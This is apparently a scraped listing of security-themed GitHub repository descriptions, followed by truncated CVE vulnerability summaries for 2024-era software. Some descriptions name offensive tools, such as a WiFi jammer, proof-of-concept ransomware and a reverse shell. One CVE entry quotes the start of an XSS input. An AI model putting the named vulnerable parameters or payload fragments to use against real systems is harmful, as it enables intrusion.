Dissertation project. Cyber security pen test tool
node_security
This is a proof of concept implementation in c# of the Aho-Corasick algorithm
spring-security
This project is from a job position on Redway Security!
For Beginners Only
spring-boot-thymeleaf-security
WIP out-of-tree collection of CUDA modules for Nixpkgs to hack more quickly without long eval times
OAuth-2.0-Get-started-as-an-API-Security-Expert
Cybersecurity Notes For Intermediate and Advanced Hackers | CEH Exam Prep Also Included
Code Pulse is a comprehensive platform designed for team management and code deployment, utilizing the mern (mongodb, express.js, react.js, node.js) stack. with a focus on streamlining communication, facilitating efficient code deployment, and ensuring ro
AUTOMATED WIFI HACKING TOOLKIT
This is a log of my programming journey! I will code one project a week to improve my coding skills, creativity, and problem solving. Hack on!
A minimal proof-of-concept of how to leverage VC and DID to implement identity and trust
This repository gives you the knowledge and resources to build secure and resilient web applications.
vestibule-security.github.io
SpringSecurity6-Examples
Documentación de retos CTF
Notas de los retos de hacking
The Safetynomicon: An Introduction to Computer Security for Wary Data Scientists
securityProject
Proof of concept of a concurrent message storage service in rust.
PP_3_1_5_Boot_Security_Rest_Controllers
Pentest-Ubuntu is a docker container built for hackers and pentesters. It contains some of the awesome pentesting tools and framework which can be used in pentesting and bughunting. This simple docker image will keep clean your main OS and helps you do yo
Some poc technical solution in daily practice
MarketVisionPro: Spearheaded by Alpha Ethos Innovators and backed by Point Break Trading Group, this advanced AI-powered trading platform redefines fintech by blending sophisticated analytics, strategic foresight, and ethical innovation. Join us in shapin
ru-security-and-privacy-of-machine-learning-23-24
Proof of concept of loading batch data via an ELT process using technologies such as Airflow, PySpark, and PostgreSQL.
Proof of concept RTEMS IOC running in QEMU
Capture The Flag security challenges I create for fun ⛳ I try to make one every year at my birthday 🎂
📚 Biblioteca de Livros úteis para área de Cybersecurity e Segurança da Informação. Indicados pela comunidade
Portfolios for Security Testing module
AddOn which provides a simple way to secure your REDAXO backend with different methods.
training program (cyber security) html design
Currently developing a React-based e-learning platform with distinct user phases: admin, mentor, and student. Admin panel is completed, focusing on refining the mentor interface. Implemented JWT authentication for security and utilized the Context API for
A proof of concept to run rm2fb on a fixed version of xochitl independently of the one used of UI
whatsapp web backend using Spring,Spring-Boot,Spring-Security and Authentication
The {metæffekt} CVSS Calculator is a web application that allows to calculate CVSS scores for multiple CVSS vectors of different versions simultaneously.
computer-and-network-security-questions
.NET Core Web API designed to handle user authentication and management. It demonstrates the implementation of JWT (JSON Web Tokens) for secure API access, alongside robust user registration and login functionalities. The API also showcases best practice
Page for Event of Hacking
Golang gin API boilerplate ,A proof of concept app for demonstrating authentication of golang app with JWT
The repo is being maintained as Data Security Proj LMU
Cryptography-and-Network-Security-
This branch is to support my book "Mastering Cyber Defense Symphony" : The Ultimate Security Orchestra: OpenSource, Wazuh, Shuffle, Cortex, TheHive, and MISP for indomitable Cyber Defense.
Книги по программированию по Data Science и IT Security
Agama Project to authenticate people using typing keyboard dynamics
Work in progress, have been paused for a long time. Backend of video game Shop, on progress. Pinned as demo of my level in spring boot. Keywords : SpringBoot, ORM, Spring data JPA, Hibernate, Spring Security, Web Api, Java
Simplify microservice security with ServiceAuthCentral: Centralized, open-source authorization in the cloud, minus the shared secrets.
Cipher Guard is a robust security application built on MERN Stack, offering a modern and performant platform to safeguard your digital credentials and sensitive information. With a focus on user-centric security, it provides a comprehensive suite of featu
A free hacked-client for Minecraft 1.8.9 Forge
Write-ups and notes for Hack The Box Academy modules
Small Project work for Alpen Adria Universität Klagenfurt
gh-security
A security and management system for school vehicles using YOLO-trained neural networks. Captures real-time video, identifies vans, reads license plates and decals, cross-referencing them to a predefined list for secure school transit.
Proof of Concept: Task Manager base event loop
MRS_Security
A module that supports deploying the Security and Compliance Center Workload Protection agent
Proof of Concept - CV Manager
TB2023-Java-DemoSpringSecurity
Hopper is a tool for generating fuzzing test cases for libraries automatically using interpretative fuzzing.
Proof of Concept: Scheduler base event loop
WatAI---CyberSecurity-23-24
My attempt to develop a tool to collate the results of pen tests to provide a metric of the security posture of the system under test.
GitHub native DevSecOps CI/CD best practices include automated security testing, code analysis, and policy enforcement using GitHub Actions, coupled with secure IaC and container security measures. This entails managing secrets, enforcing access control,
A simple API REST to store passwords with security.
A proof of concept program for testing the math behind extracting depth info from stereoscopic images.
Terraform modules for integrating Datadog security products with cloud providers
This repository showcases my portfolio as a cybersecurity professional, including different activities and abilities that I know, going from text writing to more technical skills as writing python code, navigating in linux and analytical skills as the one
Websites monitoring via GitHub Actions (expiration, security, performances, privacy, SEO)
This project aims to enhance security on university campuses through the implementation of an intelligent camera security system powered by machine learning and face recognition. Built with Python, OpenCV, TensorFlow & FastAPI
This tool is used to jam any wifi network in your local area network.
fix.security
REST API Design, Development & Management Learn the REST API Concepts, Design best practices, Security practices, Swagger 2.0/OAI, Hands on API Management
A Proof of Concept application to download certificates for a Certificate Transparency Log
Proof of concept how to handle custom per diem rate requirements
GeoNetwork Security System - Host
This tool it's for hackers and pentester!! To create the best hacking machine.
pw security checker/analyzer by attacking w john the ripepr and shit
A centralized repository of standalone security patches for open source libraries.
Proof-of-concept ransomware software, used to demonstrate how cybercriminals manage to steal people's files and lock them behind a key for which they demand a ransom.
Security Classification Banner based on UK Government Guidance
An attractive web app and fast notepad that is always with you with a complete editor with JavaScript and high security for users (updating...) 😎
Step-by-step guide and scripts for setting up TLS/SSL certificates for MQTT Mosquitto broker. Implementing username and password authentication for MQTT clients using Mosquitto.
🔒 Enterprise-grade API gateway that helps you monitor and impose cost or rate limits per API key. Get fine-grained access control and monitoring per user, application, or environment. Supports OpenAI, Azure OpenAI, Anthropic, LangChain, and open-source LL
Hacked Client For Minecraft 1.12.2
Proof of concept implementation of a Privug backend featuring an exact Bayesian inference engine based on multivariate Gaussian distributions.
Full Stack web developer. Python / JavaScript. Cyber Security.
Proof of Concept for the AI operations
Proof of concept cross architecture, cross operating system mod template for OpenGl powered games.
Known vulnerability scanning for your GitHub repository using CVE Binary Tool. This Action can scan binaries, component lists and SBOMs for known vulnerabilities and CVEs. It can generate SBOM component lists as well as reports in the Security Tab and i
Proof of concept (PoC) pruebas y ejemplos de ideas y aprendizaje
Security advisory data for Wolfi
A ROM hack of Pokemon Yellow which replaces Pikachu with Cramorant, among other things. pokeyellow disassembly is used as a base.
LibrePass Android Application
DorkStorm is the perfect tool for hacking and discovering hidden information on the internet.
A proof-of-concept ChatGPT and Hugging Face client for DOS with text-to-speech for Sound Blaster compatible systems.
Series of posts and labs to learn CosmWasm smart contract security
proof of concept for displaying stamp images
Blog App REST API’s using Spring Boot, Spring Security 6, JWT, Spring Data JPA, Hibernate, MySQL
Proof of concept using the Google Cloud SDK to generate JSON for Pulumi import
Elastic Security Labs releases
Dataset tools for acquiring and investigating hacker news
This repo is a helpful starting point for those interested in exploring the world of Android hacking and bug bounties. The resources mentioned have personally assisted me.
A proof of concept tool for using ChatGPT to transform messy text documents into structured JSON
A proof-of-concept LCF-style interactive theorem prover for HOL(C)
amazon-security-lake-ocsf-validation
A simple script to help setting up SecurityHub standards cross account
WLD Site Platform, configures WordPress with additional security and features
A Proof-of-Concept Playground to do DynamoDB data modeling
server but also fun wuuut?!?! (also this is extremely hackable, dont use >-<)
Repeatable, immutable, and scalable security research w/ Docker
To be used with the Solutions Team Technology Demo Environment
Security related components for a WordPress Multisite plattform like figuren.theater
proof-of-concepts
Cloud-native authorization for modern applications and APIs
Signing-key abuse and update exploitation framework
Australian Cyber Security Centre (ACSC) Essential Eight - Ansible role generated from ComplianceAsCode Project
Hacking-With-Swift
Statically Enforce Privacy and Security Policies on Rust code using dataflow analysis enhanced by exploiting ownership types. You can signup for our official release at the link below
hacker labs
Spring Security reactive boot demo using spring-security-pac4j + spring-webflux-pac4j
🤖 Bot to get the last Cyber Security information in a Microsoft Teams channel 🏴‍☠️
Spring Boot demo to test the spring-webflux-pac4j security library
Real-world infosec wordlists, updated regularly
♾ Infisical is the open-source secret management platform: Sync secrets across your team/infrastructure and prevent secret leaks.
Spring / React single page web application with JPA, Spring Security and H2 Database
🐦️💬 Expand Twitter, Instagram, Hacker News, and TikTok links in Telegram chats & channels (with inline video)
An awesome list for the SpiceDB ecosystem
Decentralized P2P marketplace for Monero users (proof of concept)
Hacked games flash games
This is a proof of concept for the NLP shared task organised by the ACL DravidianLangTech 2022. We converted it into a pandas dataframe and started preprocessing We removed the emoticons and removed unmatched datapoints from the dataframe along with the s
Run your favourite pentesting tools in containers as if they were native.
A PowerShell module for acquisition of data from Microsoft 365 and Azure for Incident Response and Cyber Security purposes.
C++ implementation of Tink
Quick menu for nmap
Proof of concept for approximating linear biot poroelasticity model with some non-standard quadrature rules
Capture The Flag (CTF) Related Scripts
A small package for ASP.Net (Core) to automatically configure secure HTTP-Headers
When you deal with hundreds of IP and many domain names, you can trigger many websites related to Infosec and then do screen captures to illustrate your findings #shodan #spyse #hardenize , etc.
If you’re a beginner hacker or you want to learn hacking, you heard DoS and DDoS attack for sure!
A collection of awesome software, libraries, documents, books, resources and cool stuff about cryptography in Cybersecurity.
advanced-security-material
List of public audit reports
Notes on various ethical hacking topics
Some openshift hacking bits
:boom: This tool is intended for bounty hunters, the script installs and launches the best set of tools for expanding the attack surface, for Web Sites, portals, and Organizations.
Authup is an authentication & authorization system.
Code is from 2017 - Working on my skills in OpenGl, creating a proof of concept 3D engine with basic map making capabilities
SecretManagement.DevolutionsHub
Linux ultimate self-hosted network security guide ║ Linux 终极自托管网络安全指南 ║ Guía definitiva de seguridad de red autohospedada de Linux ║ लिनक्स परम स्व-होस्टेड नेटवर्क सुरक्षा गाइड ║ Окончательное руководство по безопасности собственной сети Linux
Command line interface for the Phylum API
GB is a simple proof of concept GameBoy emulator for Windows.
SSH based reverse shell
AI Model Security Reading Notes
Elastisys Compliant Kubernetes is an open source, Certified Kubernetes distribution designed according to the ISO27001 controls: providing you with security tooling and observability from day one.
CloudSplaining on AWS Managed Policies
PASETOrs: PASETO tokens in pure Rust
Fortify+Scala+sbt example
My solutions for LeetCode, Hacker rank problems
A short proof of concept to showcase UI event responses from a singleton service
A collection of my presentations, blog posts, and other contributions to the information security community
Heimdall Enterprise Server 2 lets you view, store, and compare automated security control scan results.
Proof of Concept for .Net Core Identity
Modern, privacy-friendly, and detailed web analytics that works without cookies or JS.
https://hackingyseguridad.github.io/
Proof-of-concept implementation of the "Challenge/Response Remote Attestation" interaction model of the IETF RATS Reference Interaction Models for Remote Attestation Procedures using TPM 2.0.
This repository contains a proof of concept (POC) implementation of a music recommendation system using item-to-item based collaborative filtering. The system is implemented in Python 3.7.
Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start
Interesting APT Report Collection And Some Special IOC
Parse palo alto security rules from xml to csv
PurpleTeam
Proof of Concepts
All the games on this list can be hacked using Localiapstore/IAPStore
MPW.js is a JavaScript implementation of the Master Password App algorithm
Proof of concept for Messaging in java
Community‐developed identity management system with a flexible data model, multiple extension points and scripting support, including JavaScript and Groovy.
Sysdig Inspect - A powerful opensource interface for container troubleshooting and security investigation
⚓️ Product Manager @twilio - JavaScript Hacker - Hackathon Enthusiast - Public Speaker - Opinions are my own ⚓️
A free and open vulnerabilities database and the packages they impact. And the tools to aggregate and correlate these vulnerabilities. Sponsored by NLnet https://nlnet.nl/project/vulnerabilitydatabase/ for https://www.aboutcode.org/ Chat at https://gitter
PowerAuth Mobile SDK for adds capability for authentication and transaction signing into the mobile apps (ios, watchos, android).
Base Docker image for simpleSAMLphp
iText for .NET is the .NET version of the iText library, formerly known as iTextSharp, which it replaces. iText represents the next level of SDKs for developers that want to take advantage of the benefits PDF can bring. Equipped with a better document eng
iText for Java represents the next level of SDKs for developers that want to take advantage of the benefits PDF can bring. Equipped with a better document engine, high and low-level programming capabilities and the ability to create, edit and enhance PDF
Kernel Hardening; Protect Linux User Accounts against Brute Force Attacks; Improve Entropy Collection; Strong Linux User Account Separation; Enhances Misc Security Settings - https://www.kicksecure.com/wiki/Security-misc
The ZAP core project
SQL powered operating system instrumentation, monitoring, and analytics.
Development tools for people who hack on arvados core
NUS Hackers website
Play Scala demo to test the play-pac4j security library
Play Java demo to test the play-pac4j security library
Content Security Policy for Django.
CVE-2024-1810 -- The Archivist – Custom Archive Templates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘shortcode_attributes' parameter in all versions up to, and including, 1.7.5 due to insufficient input sanitization and output escaping.
CVE-2024-21501 -- Versions of the package sanitize-html before 2.12.1 are vulnerable to Information Exposure when used on the backend and with the style attribute allowed, allowing enumeration of files in the system (including project dependencies). An attacker could explo
CVE-2024-21502 -- Versions of the package fastecdsa before 2.3.2 are vulnerable to Use of Uninitialized Variable on the stack, via the curvemath_mul function in src/curveMath.c, due to being used and interpreted as user-defined type. Depending on the variable's actual valu
CVE-2024-22395 -- Improper access control vulnerability has been identified in the SMA100 SSL-VPN virtual office portal, which in specific conditions could potentially enable a remote authenticated attacker to associate another user's MFA mobile application.
CVE-2022-43842 -- IBM Aspera Console 3.4.0 through 3.4.2 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 239
CVE-2023-24416 -- Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Arne Franken All In One Favicon.This issue affects All In One Favicon: from n/a through 4.7.
CVE-2023-37540 -- Sametime Connect desktop chat client includes, but does not use or require, the use of an Eclipse feature called Secure Storage. Using this Eclipse feature to store sensitive data can lead to exposure of that data.
CVE-2023-4826 -- The SocialDriver WordPress theme before version 2024 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties resulting in a cross-site scripting (XSS) attack.
CVE-2023-51392 -- Ember ZNet between v7.2.0 and v7.4.0 used software AES-CCM instead of integrated hardware cryptographic accelerators, potentially increasing risk of electromagnetic and differential power analysis sidechannel attacks.
CVE-2023-51394 -- High traffic environments may result in NULL Pointer Dereference vulnerability in Silicon Labs's Ember ZNet SDK before v7.4.0, causing a system crash.
CVE-2024-0563 -- Denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows anonymous user to cause denial of service against other anonymous users.
CVE-2024-1360 -- The Colibri WP theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.94. This is due to missing or incorrect nonce validation on the colibriwp_install_plugin() function. This makes it possible for unauth
CVE-2024-1361 -- The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the apiCall() function. This makes it possible for unauthentic
CVE-2024-1362 -- The Colibri Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.253. This is due to missing or incorrect nonce validation on the cp_shortcode_refresh() function. This makes it possible fo
CVE-2024-1590 -- The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Widget in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output esca
CVE-2024-1776 -- The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to SQL Injection via the 'form-id' parameter in all versions up to, and including, 1.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient p
CVE-2024-1777 -- The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the settings update function. This makes i
CVE-2024-1778 -- The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_bookmark() function in all versions up to, and including, 1.1.1. This makes it
CVE-2024-1779 -- The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_status() function in all versions up to, and including, 1.1.1. This makes it po
CVE-2024-1781 -- A vulnerability was found in Totolink X6000R AX3000 9.4.0cu.852_20230719. It has been rated as critical. This issue affects the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. The manipulation leads to command injection. Th
CVE-2024-1783 -- A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130/9.3.5u.6698_B20230810. Affected is the function loginAuth of the file /cgi-bin/cstecgi.cgi of the component Web Interface. The manipulation of the argument ht
CVE-2024-1784 -- A vulnerability classified as problematic was found in Limbas 5.2.14. Affected by this vulnerability is an unknown functionality of the file main_admin.php. The manipulation of the argument tab_group leads to sql injection. The complexity of an attack is
CVE-2024-1786 -- ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DIR-600M C1 3.08. Affected by this issue is some unknown functionality of the component Telnet Service. The manipulation of the argument username l
CVE-2024-1817 -- A vulnerability has been found in Demososo DM Enterprise Website Building System up to 2022.8 and classified as critical. Affected by this vulnerability is the function dmlogin of the file indexDM_load.php of the component Cookie Handler. The manipulation
CVE-2024-1818 -- A vulnerability was found in CodeAstro Membership Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /uploads/ of the component Logo Handler. The manipulation leads to unrestricted upload. Th
CVE-2024-1819 -- A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the component Add Members Tab. The manipulation of the argument Member Photo leads to unrestricted upload. It is p
CVE-2024-1820 -- A vulnerability was found in code-projects Crime Reporting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file inchargelogin.php. The manipulation of the argument email/password leads to sql injection. The att
CVE-2024-1821 -- A vulnerability was found in code-projects Crime Reporting System 1.0. It has been rated as critical. This issue affects some unknown processing of the file police_add.php. The manipulation of the argument police_name/police_id/police_spec/password leads
CVE-2024-1822 -- A vulnerability classified as problematic has been found in PHPGurukul Tourism Management System 1.0. Affected is an unknown function of the file user-bookings.php. The manipulation of the argument Full Name leads to cross site scripting. It is possible t
CVE-2024-1823 -- A vulnerability classified as critical was found in CodeAstro Simple Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file users.php of the component Backend. The manipulation leads to improper access controls. The atta
CVE-2024-1824 -- A vulnerability, which was classified as critical, has been found in CodeAstro House Rental Management System 1.0. Affected by this issue is some unknown functionality of the file signing.php. The manipulation of the argument uname/password leads to sql i
CVE-2024-1825 -- A vulnerability, which was classified as problematic, was found in CodeAstro House Rental Management System 1.0. This affects an unknown part of the component User Registration Page. The manipulation of the argument address with the input <img src="1" one
CVE-2024-1826 -- A vulnerability has been found in code-projects Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file Source/librarian/user/student/login.php. The manipulation of the argument username/password leads to sql inj
CVE-2024-1827 -- A vulnerability was found in code-projects Library System 1.0 and classified as critical. This issue affects some unknown processing of the file Source/librarian/user/teacher/login.php. The manipulation of the argument username/password leads to sql injec
CVE-2024-1828 -- A vulnerability was found in code-projects Library System 1.0. It has been classified as critical. Affected is an unknown function of the file Source/librarian/user/teacher/registration.php. The manipulation of the argument email/idno/phone/username leads
CVE-2024-1829 -- A vulnerability was found in code-projects Library System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Source/librarian/user/student/registration.php. The manipulation of the argument email/
CVE-2024-1830 -- A vulnerability was found in code-projects Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file Source/librarian/user/student/lost-password.php. The manipulation of the argument email leads to
CVE-2024-1831 -- A vulnerability, which was classified as critical, was found in SourceCodester Complete File Management System 1.0. Affected is an unknown function of the file users/index.php of the component Login Form. The manipulation of the argument username with the
CVE-2024-1832 -- A vulnerability has been found in SourceCodester Complete File Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ of the component Admin Login Form. The manipulation of the argu
CVE-2024-1833 -- A vulnerability was found in SourceCodester Employee Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /Account/login.php. The manipulation of the argument txtusername leads to sql injection
CVE-2024-1834 -- A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as problematic. This affects an unknown part of the file ?page=attendance&class_id=1. The manipulation of the argument class_date with the input 2024-
CVE-2024-21423 -- Microsoft Edge (Chromium-based) Information Disclosure Vulnerability
CVE-2024-22243 -- Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.ht
CVE-2024-22776 -- Wallos 0.9 is vulnerable to Cross Site Scripting (XSS) in all text-based input fields without proper validation, excluding those requiring specific formats like date fields.
CVE-2024-22988 -- An issue in zkteco zkbio WDMS v.8.0.5 allows an attacker to execute arbitrary code via the /files/backup/ component.
CVE-2024-23320 -- Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.
CVE-2024-24309 -- In the module "Survey TMA" (ecomiz_survey_tma) up to version 2.0.0 from Ecomiz for PrestaShop, a guest can download personal information without restriction.
CVE-2024-24310 -- In the module "Generate barcode on invoice / delivery slip" (ecgeneratebarcode) from Ether Creation <= 1.2.0 for PrestaShop, a guest can perform SQL injection.
CVE-2024-24681 -- Insecure AES key in Yealink Configuration Encrypt Tool below verrsion 1.2. A single, vendorwide, hardcoded AES key in the configuration tool used to encrypt provisioning documents was leaked leading to a compromise of confidentiality of provisioning docum
CVE-2024-25469 -- SQL Injection vulnerability in CRMEB crmeb_java v.1.3.4 and before allows a remote attacker to obtain sensitive information via the latitude and longitude parameters in the api/front/store/list component.
CVE-2024-25629 -- c-ares is a C library for asynchronous DNS requests. `ares__read_line()` is used to parse local configuration files such as `/etc/resolv.conf`, `/etc/nsswitch.conf`, the `HOSTALIASES` file, and if using a c-ares version prior to 1.27.0, the `/etc/hosts` f
CVE-2024-25730 -- Hitron CODA-4582 and CODA-4589 devices have default PSKs that are generated from 5-digit hex values concatenated with a "Hitron" substring, resulting in insufficient entropy (only about one million possibilities).
CVE-2024-25915 -- Server-Side Request Forgery (SSRF) vulnerability in Raaj Trambadia Pexels: Free Stock Photos.This issue affects Pexels: Free Stock Photos: from n/a through 1.2.2.
CVE-2024-25928 -- Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sitepact.This issue affects Sitepact: from n/a through 1.0.5.
CVE-2024-26150 -- `@backstage/backend-common` is a common functionality library for backends for Backstage, an open platform for building developer portals. In `@backstage/backend-common` prior to versions 0.21.1, 0.20.2, and 0.19.10, paths checks with the `resolveSafeChil
CVE-2024-27132 -- Insufficient sanitization in MLflow leads to XSS when running an untrusted recipe.
CVE-2024-27133 -- Insufficient sanitization in MLflow leads to XSS when running a recipe that uses an untrusted dataset. This issue leads to a client-side RCE when running the recipe in Jupyter Notebook. The vulnerability stems from lack of sanitization over dataset table
CVE-2024-27318 -- Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerab
CVE-2024-27319 -- Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.
CVE-2022-25377 -- The ACME-challenge endpoint in Appwrite 0.5.0 through 0.12.x before 0.12.2 allows remote attackers to read arbitrary local files via ../ directory traversal. In order to be vulnerable, APP_STORAGE_CERTIFICATES/.well-known/acme-challenge must exist on disk
CVE-2023-29179 -- A null pointer dereference in Fortinet FortiOS version 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, Fortiproxy version 7.2.0 through 7.2.4, 7.0.0 through 7.0.10 allows attacker to denial of service via specially crafted HTTP requests.
CVE-2023-29180 -- A null pointer dereference in Fortinet FortiOS version 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.14, 6.0.0 through 6.0.16, FortiProxy 7.2.0 through 7.2.3, 7.0.0 through 7.0.10, 2.0.0 through 2.0.12, 1.2.0 through 1
CVE-2023-29181 -- A use of externally-controlled format string in Fortinet FortiOS 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.14, 6.0.0 through 6.0.16, FortiProxy 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, 2.0.0 through 2.0.12, 1.2.0
CVE-2023-3966 -- A flaw was found in Open vSwitch where multiple versions are vulnerable to crafted Geneve packets, which may result in a denial of service and invalid memory accesses. Triggering this issue requires that hardware offloading via the netlink path is enabled
CVE-2023-44379 -- baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the site search feature. Version 5.0.9 contains a fix for this vulnerability.
CVE-2023-4895 -- An issue has been discovered in GitLab EE affecting all versions starting from 12.0 to 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. This vulnerability allows for bypassing the 'group ip restriction'
CVE-2023-51388 -- Hertzbeat is a real-time monitoring system. In `CalculateAlarm.java`, `AviatorEvaluator` is used to directly execute the expression function, and no security policy is configured, resulting in AviatorScript (which can execute any static method by default)
CVE-2023-51389 -- Hertzbeat is a real-time monitoring system. At the interface of `/define/yml`, SnakeYAML is used as a parser to parse yml content, but no security configuration is used, resulting in a YAML deserialization vulnerability. Version 1.4.1 fixes this vulnerabi
CVE-2023-51450 -- baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
CVE-2023-51653 -- Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be u
CVE-2023-52160 -- The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerabi
CVE-2023-52161 -- The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and ins
CVE-2023-6477 -- An issue has been discovered in GitLab EE affecting all versions starting from 16.5 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. When a user is assigned a custom role with admin_group_member
CVE-2024-0410 -- An authorization bypass vulnerability was discovered in GitLab affecting versions 15.1 prior to 16.7.6, 16.8 prior to 16.8.3, and 16.9 prior to 16.9.1. A developer could bypass CODEOWNERS approvals by creating a merge conflict.
CVE-2024-0446 -- A maliciously crafted STP, CATPART or MODEL file when parsed in ASMKERN228A.dll through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code i
CVE-2024-0861 -- An issue has been discovered in GitLab EE affecting all versions starting from 16.4 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Users with the `Guest` role can change `Custom dashboard proje
CVE-2024-0903 -- The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficie
CVE-2024-1053 -- The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'email' action in all versions up to, and including, 5.8.1. This makes it possible for authenticated attackers, w
CVE-2024-1104 -- An unauthenticated remote attacker can bypass the brute force prevention mechanism and disturb the webservice for all users.
CVE-2024-1451 -- An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.9 before 16.9.1. A crafted payload added to the user profile page could lead to a stored XSS on the client side, allowing attackers to perform arbitrary actions on behal
CVE-2024-1525 -- An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.1 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Under some specialized conditions, an LDAP user may be able
CVE-2024-1563 -- An attacker could have executed unauthorized scripts on top origin sites using a JavaScript URI when opening an external URL with a custom Firefox scheme and a timeout race condition. This vulnerability affects Focus for iOS < 122.
CVE-2024-1748 -- A vulnerability classified as critical was found in van_der_Schaar LAB AutoPrognosis 0.1.21. This vulnerability affects the function load_model_from_file of the component Release Note Handler. The manipulation leads to deserialization. The attack can be i
CVE-2024-1749 -- A vulnerability, which was classified as problematic, has been found in Bdtask Bhojon Best Restaurant Management Software 2.9. This issue affects some unknown processing of the file /dashboard/message of the component Message Page. The manipulation of the
CVE-2024-1750 -- A vulnerability, which was classified as critical, was found in TemmokuMVC up to 2.3. Affected is the function get_img_url/img_replace in the library lib/images_get_down.php of the component Image Download Handler. The manipulation leads to deserializatio
CVE-2024-22393 -- Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.
CVE-2024-22547 -- WayOS IBR-7150 <17.06.23 is vulnerable to Cross Site Scripting (XSS).
CVE-2024-23094 -- Flusity-CMS v2.33 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /cover/addons/info_media_gallery/action/edit_addon_post.php
CVE-2024-23120 -- A maliciously crafted STP file when parsed in ASMIMPORT228A.dll through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of
CVE-2024-23121 -- A maliciously crafted MODEL file when parsed in libodxdll.dll through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of t
CVE-2024-23122 -- A maliciously crafted 3DM file when parsed in opennurbs.dll through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the
